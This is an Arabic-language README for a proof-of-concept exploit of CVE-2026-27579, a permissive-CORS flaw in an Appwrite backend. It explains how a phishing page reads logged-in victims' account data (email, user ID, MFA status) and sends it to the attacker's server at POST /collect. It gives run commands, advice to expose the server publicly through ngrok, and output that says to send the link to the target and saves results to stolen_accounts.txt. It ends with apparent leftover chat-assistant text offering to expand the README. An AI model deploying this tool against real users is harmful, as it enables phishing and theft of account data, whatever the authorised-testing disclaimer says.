
استغلال PoC لثغرة CVE-2026-27579، وهي سوء تكوين CORS في الواجهة الخلفية لـ Appwrite، تُظهر سرقة بيانات الحساب المعتمدة عبر صفحة تصيّد خبيثة.
CVE-2026-27579 – تسريب بيانات الحساب الموثّق عبر CORS متساهل
CVE-2026-27579 (GHSA-qh5m-p8jh-hx88)
سوء تكوين خطير في CORS في الواجهة الخلفية لـ Appwrite المستخدمة في منصة التعاون في الوقت الفعلي يسمح لأصل يتحكم فيه المهاجم بقراءة بيانات المستخدم الحساسة الموثّقة (البريد الإلكتروني، معرف المستخدم، حالة MFA، إلخ) من الضحايا المسجّلين عبر طلبات عبر الأصول مع بيانات الاعتماد.
/v1/account مع انعكاس Access-Control-Allow-Origin + Access-Control-Allow-Credentials: trueflowchart TD
A[Victim is logged in\nCollabPlatform / Appwrite] --> B[Victim visits attacker-controlled page\nphishing link / malvertising]
B --> C[Browser sends GET /v1/account\nwith session cookies credentials: 'include']
C --> D[Appwrite reflects arbitrary Origin\nAccess-Control-Allow-Origin: evil.com]
D --> E[Access-Control-Allow-Credentials: true]
E --> F[Browser allows JavaScript to read response\nemail, $id, mfa, name, ...]
F --> G[Data exfiltrated to attacker server\nPOST /collect]
G --> H[Attacker receives full account details]
--lhost و --lport مخصصينpip install flask
# الاستخدام الأساسي
python3 exploit.py --lhost 192.168.1.100 --lport 8000
# باستخدام نطاق / عنوان IP عام
python3 exploit.py --lhost attacker.yourdomain.com --lport 8080
# للتعرض العام (موصى به)
# 1. شغّل السكربت
# 2. استخدم ngrok: ngrok http 8000
# 3. استبدل http://<lhost>:<lport> في الكود برابط ngrok الخاص بك
# (أو أعد التشغيل مع --lhost = your-ngrok-url.ngrok-free.app)
مثال على المخرجات عند التشغيل:
[*] Starting malicious server → http://192.168.1.100:8000
[*] Send this link to the target:
http://192.168.1.100:8000/
عندما يزور الضحية الرابط وهو مسجّل الدخول → تظهر البيانات في الطرفية + تُحفظ في stolen_accounts.txt
هذا الكود مقدم لأغراض تعليمية، واختبارات الأمان المصرّح بها، وتمارين الفريق الأحمر، وأبحاث الثغرات فقط.
الاستخدام غير المصرّح ضد أي نظام أو فرد دون إذن كتابي صريح غير قانوني في معظم الدول (قوانين الاحتيال الحاسوبي، الوصول غير المصرّح به، سرقة البيانات، التصيد، إلخ).
استخدم فقط في البيئات التي تملكها أو لديك إذن رسمي لاختبارها.
محمد إدريس بني عامر
باحث أمني
الأردن
Instagram: @banyamer_security
لا تتردد في نسخ ولصق هذا مباشرة في ملف README.md الخاص بك.
إذا كنت تريد إضافة لقطات شاشة، أو تغيير ألوان الشارات، أو إضافة أقسام إضافية (عرض توضيحي، تخفيف، إلخ)، أو تضمين شارة الترخيص / عدّادات النجوم / الشوكات — أخبرني ويمكنني توسيعه.